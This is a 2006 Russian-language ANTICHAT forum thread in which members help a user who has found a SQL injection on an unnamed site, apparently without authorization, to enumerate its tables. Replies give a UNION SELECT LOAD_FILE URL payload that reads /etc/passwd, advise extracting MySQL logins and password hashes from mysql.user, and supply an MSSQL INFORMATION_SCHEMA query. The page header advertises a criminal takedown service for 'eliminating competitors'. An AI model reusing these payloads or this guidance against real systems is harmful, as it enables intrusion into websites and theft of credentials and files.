Есть возможность произвести sql-inj, но нет информации о таблицах(названия ,поля)... — ANTICHAT Forum

FORUMS

MEMBERS

RECENT POSTS

LOG IN

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

loading...

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Есть возможность произвести sql-inj, но нет информации о таблицах(названия ,поля)...

Ответ

Опции темы

Поиск в этой теме

Опции просмотра

Есть возможность произвести sql-inj, но нет информации о таблицах(названия ,поля)...

#1

Старый

23.02.2006, 13:45

Аватар для perun

perun

Новичок

Регистрация: 14.11.2005

Сообщений: 19

С нами: 10782860

Репутация: 5

По умолчанию

Есть возможность произвести sql-inj, но нет информации о таблицах(названия ,поля)...

Есть возможность произвести sql-inj,
но нет информации о таблицах(названия ,поля)
Если кто-нибудь знает, как получить эту инфу ,помогите плз.

𝕏 Twitter Reddit Telegram Копировать ссылку

Последний раз редактировалось perun; 23.02.2006 в 13:55..

Ответить с цитированием

#2

Старый

23.02.2006, 14:19

Аватар для virgoz

virgoz

Участник форума

Регистрация: 16.09.2004

Сообщений: 193

С нами: 11393666

Репутация: 47

По умолчанию

Если mysql, то пробуй mysql.user дальше логины и пасы от мускуля посмотришь в столбцах user и password. Подругому никак

Можешь файлы почитать:

Цитата:

http://site/test.php?id=9999+union+select+null,LOAD_FILE(char( 47,101,116,99,47,112,97,115,115,119,100)),null/*

Если mmsql, то этот запрос

Цитата:

SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

вернет первую таблицы в базе.
Если что-то проканает, пиши... помогу дальше

Ответить с цитированием

#3

Старый

23.02.2006, 14:23

Аватар для Rebz

Rebz

Флудер

Регистрация: 08.11.2004

Сообщений: 3,395

С нами: 11317286

Репутация: 3876

По умолчанию

Держи очень полезные ссылки:
http://injection.rulezz.ru/MSSQL-ASP-Injection.html
http://injection.rulezz.ru/MSSQL-Injection.html
Там найдёшь все ответы

Ответить с цитированием

#4

Старый

24.02.2006, 02:44

Аватар для Grrl

Grrl

Участник форума

Регистрация: 17.07.2004

Сообщений: 181

С нами: 11481506

Репутация: 97

По умолчанию

если там стоит кактойто готовый движок то можно полпробывать найти скачать и посмотреть структуру на локалхосте...

Ответить с цитированием

Ответ

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Terms and Rules

ANTICHAT ™ © 2001- Antichat Kft.